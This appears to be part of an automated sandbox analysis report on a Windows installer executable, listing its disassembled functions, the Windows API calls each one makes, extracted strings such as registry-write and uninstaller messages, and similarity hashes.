                                                                                        • Opcode Fuzzy Hash: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                                                                        • Instruction Fuzzy Hash: 38919331900219EBDF109FA4CD88AAFBBB8EF44741F11447BE546F6281DB388A51CF68
                                                                                        Function 00405479 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054B5
                                                                                        • ShowWindow.USER32(?), ref: 004054D2
                                                                                        • DestroyWindow.USER32 ref: 004054E6
                                                                                        • SetWindowLongW.USER32(?,00000000,00000000), ref: 00405502
                                                                                        • GetDlgItem.USER32(?,?), ref: 00405523
                                                                                        • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405537
                                                                                        • IsWindowEnabled.USER32(00000000), ref: 0040553E
                                                                                        • GetDlgItem.USER32(?,00000001), ref: 004055ED
                                                                                        • GetDlgItem.USER32(?,00000002), ref: 004055F7
                                                                                        • SetClassLongW.USER32(?,000000F2,?), ref: 00405611
                                                                                        • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00405662
                                                                                        • GetDlgItem.USER32(?,00000003), ref: 00405708
                                                                                        • ShowWindow.USER32(00000000,?), ref: 0040572A
                                                                                        • EnableWindow.USER32(?,?), ref: 0040573C
                                                                                        • EnableWindow.USER32(?,?), ref: 00405757
                                                                                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040576D
                                                                                        • EnableMenuItem.USER32(00000000), ref: 00405774
                                                                                        • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040578C
                                                                                        • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040579F
                                                                                        • lstrlenW.KERNEL32(00447240,?,00447240,0046ADC0), ref: 004057C8
                                                                                        • SetWindowTextW.USER32(?,00447240), ref: 004057DC
                                                                                        • ShowWindow.USER32(?,0000000A), ref: 00405910
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                        • String ID: @rD
                                                                                        • API String ID: 184305955-3814967855
                                                                                        • Opcode ID: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                                                                                        • Instruction ID: 0f9b988f21b44e482dc064b3562f20aa73efc2902ac8c6ffeb9ddf27563d0ddb
                                                                                        • Opcode Fuzzy Hash: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                                                                                        • Instruction Fuzzy Hash: D8C1C371500A04EBDB216F61EE49E2B3BA9EB45345F00093EF551B12F0DB799891EF2E
                                                                                        Function 004040B8 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040416D
                                                                                        • GetDlgItem.USER32(?,000003E8), ref: 00404181
                                                                                        • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040419E
                                                                                        • GetSysColor.USER32(?), ref: 004041AF
                                                                                        • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041BD
                                                                                        • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041CB
                                                                                        • lstrlenW.KERNEL32(?), ref: 004041D6
                                                                                        • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004041E3
                                                                                        • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004041F2
                                                                                          • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404124,?), ref: 00403FE1
                                                                                          • Part of subcall function 00403FCA: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404124,?), ref: 00403FF0
                                                                                          • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404124,?), ref: 00404004
                                                                                        • GetDlgItem.USER32(?,0000040A), ref: 0040424A
                                                                                        • SendMessageW.USER32(00000000), ref: 00404251
                                                                                        • GetDlgItem.USER32(?,000003E8), ref: 0040427E
                                                                                        • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042C1
                                                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 004042CF
                                                                                        • SetCursor.USER32(00000000), ref: 004042D2
                                                                                        • ShellExecuteW.SHELL32(0000070B,open,00462540,00000000,00000000,00000001), ref: 004042E7
                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 004042F3
                                                                                        • SetCursor.USER32(00000000), ref: 004042F6
                                                                                        • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404325
                                                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404337
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                                        • String ID: @%F$N$open
                                                                                        • API String ID: 3928313111-3849437375
                                                                                        • Opcode ID: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                                                                        • Instruction ID: 2c1438ad93098d7b112eeb2502b55652a68651cb38e922ac8f4fb42b83a973d4
                                                                                        • Opcode Fuzzy Hash: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                                                                        • Instruction Fuzzy Hash: 0F71A4B1900609FFDB109F60DD45EAA7B79FB44305F00843AFA05B62D1C778A991CF99
                                                                                        Function 00406A99 Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 163filestringmemoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • lstrcpyW.KERNEL32(0045B2C8,NUL), ref: 00406AA9
                                                                                        • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AC8
                                                                                        • GetShortPathNameW.KERNEL32(000000F1,0045B2C8,00000400), ref: 00406AD1
                                                                                          • Part of subcall function 00405DB6: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                                                          • Part of subcall function 00405DB6: lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                                                        • GetShortPathNameW.KERNEL32(000000F1,00460920,00000400), ref: 00406AF2
                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,0045B2C8,000000FF,0045BAC8,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B1B
                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00460920,000000FF,0045C118,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B33
                                                                                        • wsprintfA.USER32 ref: 00406B4D
                                                                                        • GetFileSize.KERNEL32(00000000,00000000,00460920,C0000000,00000004,00460920,?,?,00000000,000000F1,?), ref: 00406B85
                                                                                        • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406B94
                                                                                        • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BB0
                                                                                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406BE0
                                                                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0045C518,00000000,-0000000A,0040987C,00000000,[Rename]), ref: 00406C37
                                                                                          • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                                          • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                                        • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C4B
                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00406C52
                                                                                        • CloseHandle.KERNEL32(?), ref: 00406C5C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                                        • String ID: F$%s=%s$NUL$[Rename]
                                                                                        • API String ID: 565278875-1653569448
                                                                                        • Opcode ID: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
                                                                                        • Instruction ID: f97e154d5ee7f709bd30e138c0dd6e282719408add8f0d739c14b832633f1bd9
                                                                                        • Opcode Fuzzy Hash: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
                                                                                        • Instruction Fuzzy Hash: AE412632104208BFE6206B619E8CD6B3B6CDF86754B16043EF586F22D1DA3CDC158ABC
                                                                                        Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                        • BeginPaint.USER32(?,?), ref: 00401047
                                                                                        • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                                        • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                                        • DeleteObject.GDI32(?), ref: 004010F6
                                                                                        • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                                        • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                                        • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                                        • DrawTextW.USER32(00000000,0046ADC0,000000FF,00000010,00000820), ref: 0040115F
                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                                        • DeleteObject.GDI32(?), ref: 0040116E
                                                                                        • EndPaint.USER32(?,?), ref: 00401177
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                        • String ID: F
                                                                                        • API String ID: 941294808-1304234792
                                                                                        • Opcode ID: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                                                                        • Instruction ID: e7530e13063599d95e155ed3b2c7b7521dfa2668d538c4695d9c695e9582dc0d
                                                                                        • Opcode Fuzzy Hash: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                                                                        • Instruction Fuzzy Hash: 01516C71400209AFCB058F95DE459AF7FB9FF45311F00802EF992AA1A0CB78DA55DFA4
                                                                                        Function 00402880 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                                        • lstrlenW.KERNEL32(004130D8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                                        • RegSetValueExW.ADVAPI32(?,?,?,?,004130D8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                                        • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                        Strings
                                                                                        • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                                        • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                                        • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                                        • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                                        • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                                        • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                                        • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                                        • API String ID: 1641139501-220328614
                                                                                        • Opcode ID: d79db666ee92a39b53e47641609ed565b43369f8775619f718224e07aa5483b4
                                                                                        • Instruction ID: 4ea7a0066738be70411365ddd6f3e5606018e51d84950e7919a1ab5782edcef9
                                                                                        • Opcode Fuzzy Hash: d79db666ee92a39b53e47641609ed565b43369f8775619f718224e07aa5483b4
                                                                                        • Instruction Fuzzy Hash: 3D41BFB2D00209BFDF11AF90CE46DAEBBB9EB04704F20407BF505B61A1D6B94B509B59
                                                                                        Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                                        • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                                        • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                                        • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                                        Strings
                                                                                        • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                        • String ID: created uninstaller: %d, "%s"
                                                                                        • API String ID: 3294113728-3145124454
                                                                                        • Opcode ID: c666975226392a23a96cc8c7abb3eb5c8f7508c76e04a15e1ccd320165ca38cb
                                                                                        • Instruction ID: 876417c632a2c352b67fb01c84f3ccb8dada3a759dccfb7ac575e016526b3130
                                                                                        • Opcode Fuzzy Hash: c666975226392a23a96cc8c7abb3eb5c8f7508c76e04a15e1ccd320165ca38cb
                                                                                        • Instruction Fuzzy Hash: E231B272800115BBCB11AFA4CE45DAF7FB9EF08364F10023AF555B61E1CB794E419B98
                                                                                        Function 004060E7 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72filestringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                                                        • GetFileAttributesW.KERNEL32(0046A560,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040613C
                                                                                        • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,0046A560,40000000,00000004), ref: 00406175
                                                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,0046A560,40000000,00000004), ref: 00406181
                                                                                        • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00409678), ref: 0040619B
                                                                                        • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,004062D4,00000000), ref: 004061A2
                                                                                        • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,004062D4,00000000,?,?,004062D4,00000000), ref: 004061B7
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                                        • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                        • API String ID: 3734993849-2769509956
                                                                                        • Opcode ID: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                                                                        • Instruction ID: 719ae6cd10854ac59b0cdc08190af65770ef99398ad526dd54b0ef62760a23c4
                                                                                        • Opcode Fuzzy Hash: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                                                                        • Instruction Fuzzy Hash: 4621F271400200BBD710AB64DD88D9B376CEB02370B25C73AF626BA1E1E77449868BAD
                                                                                        Function 00403DCA Relevance: 12.1, APIs: 8, Instructions: 60COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetWindowLongW.USER32(?,000000EB), ref: 00403DE4
                                                                                        • GetSysColor.USER32(00000000), ref: 00403E00
                                                                                        • SetTextColor.GDI32(?,00000000), ref: 00403E0C
                                                                                        • SetBkMode.GDI32(?,?), ref: 00403E18
                                                                                        • GetSysColor.USER32(?), ref: 00403E2B
                                                                                        • SetBkColor.GDI32(?,?), ref: 00403E3B
                                                                                        • DeleteObject.GDI32(?), ref: 00403E55
                                                                                        • CreateBrushIndirect.GDI32(?), ref: 00403E5F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                        • String ID:
                                                                                        • API String ID: 2320649405-0
                                                                                        • Opcode ID: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                                                                        • Instruction ID: efe235911933e34786796033030fc6f48e67331b78f43f6f4bde0ddab4ebbdd0
                                                                                        • Opcode Fuzzy Hash: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                                                                        • Instruction Fuzzy Hash: 7D1166715007046BCB219F78DE08B5BBFF8AF01755F048A2DE886F22A0D774DA48CB94
                                                                                        Function 004023F0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 83libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                          • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB), ref: 00404FCD
                                                                                          • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                        • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                                        • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                                        Strings
                                                                                        • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                                        • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                                        • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                                        • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s
                                                                                        • API String ID: 1033533793-945480824
                                                                                        • Opcode ID: aebbfb54fe117075fb91935afd2b3d42be9cb3525beaf419298f1839c78bdf39
                                                                                        • Instruction ID: e967fad4df15afb35ea17a6f8951328f27fda4bee3b51f855042d01f5ead75df
                                                                                        • Opcode Fuzzy Hash: aebbfb54fe117075fb91935afd2b3d42be9cb3525beaf419298f1839c78bdf39
